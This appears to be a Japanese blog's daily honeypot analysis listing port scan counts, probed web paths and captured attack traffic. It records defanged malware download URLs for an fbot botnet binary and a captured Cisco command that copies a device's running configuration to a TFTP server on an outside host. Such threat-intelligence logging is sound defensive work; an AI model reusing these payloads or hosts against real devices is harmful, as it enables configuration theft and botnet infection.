【ハニーポット簡易分析】Honeypot簡易分析(322日目:7/5)
Honeypot簡易分析(322日目:7/5)となります。
■Honeytrap
※80ポートは除く
<ポート検知数(30日平均比)>
ポート番号 | サービス | 件数 | 件数差(30日平均) |
---|---|---|---|
445 | smb | 4289 | 838 |
5038 | Unknown | 2092 | 2080 |
23 | telnet | 1466 | -18 |
5900 | vnc | 529 | -3473 |
3306 | mysql | 329 | 159 |
139 | netbios-ssn | 284 | 261 |
3389 | rdp | 132 | -102 |
81 | hosts2-ns | 85 | 56 |
3307 | opsession-prxy | 80 | 38 |
2323 | telnet | 77 | -10 |
<新規マルウェアダウンロード>
malware | payload |
134.209.230[.]124 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
hxxp://5.206.227[.]65/codingdrunk/fbot.x86 | CNXN… |
ftp://103.26.100[.]154/160.16.145.183[.]conf | G7.`......copy system:running-config flash:/config.text.... ....copy flash:/config.text tftp://103[.]26[.]100[.]154/160[.]16[.]145[.]183[.]conf.. |
hxxp://5.206.227[.]65/codingdrunk/fbot.arm7 | CNXN… |
Cisco OSへの攻撃を狙ったと思われる通信を検知していました。マルウェアの種類までは特定できませんでした。
■WoWHoneeypot
<検知パス一覧>
path | target | CVE | reference |
/ | - | - | - |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 |
/favicon.ico | - | - | - |
/robots.txt | - | - | - |
hxxp://110.249.212[.]46/testget | Unauthorized Relay | - | - |
/.well-known/security.txt | SSL certificate | - | https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 |
/sitemap.xml | xml sitemap | - | - |
/user/login.html | Unknown | - | - |
/.git/config | git | - | - |
/\cgi-bin/get_status.cgi | /\cgi-bin/get_status.cgi | - | - |
/\cgi-bin/login.cgi | CGI | - | - |
/web/cgi-bin/hi3510/param.cgi | Zivif Web | CVE-2017-17106 | https://sec-owl.hatenablog.com/entry/2018/09/24/011848 |
cn.bing.com:443 | Unauthorized Relay | - | - |
hxxp://123.125.114[.]144/ | Unauthorized Relay | - | - |
hxxp://5.188.210[.]101/echo.php | Unauthorized Relay | - | - |
hxxp://www.123cha[.]com/ | Unauthorized Relay | - | - |
hxxp://www.ip[.]cn/ | Unauthorized Relay | - | - |
www[.]baidu[.]com:443 | Unauthorized Relay | - | - |
xui.ptlogin2[.]qq[.]com:443 | Unauthorized Relay | - | - |
<新規検知パス一覧>
なし
<マルウェアダウンロード>
なし
以上となります。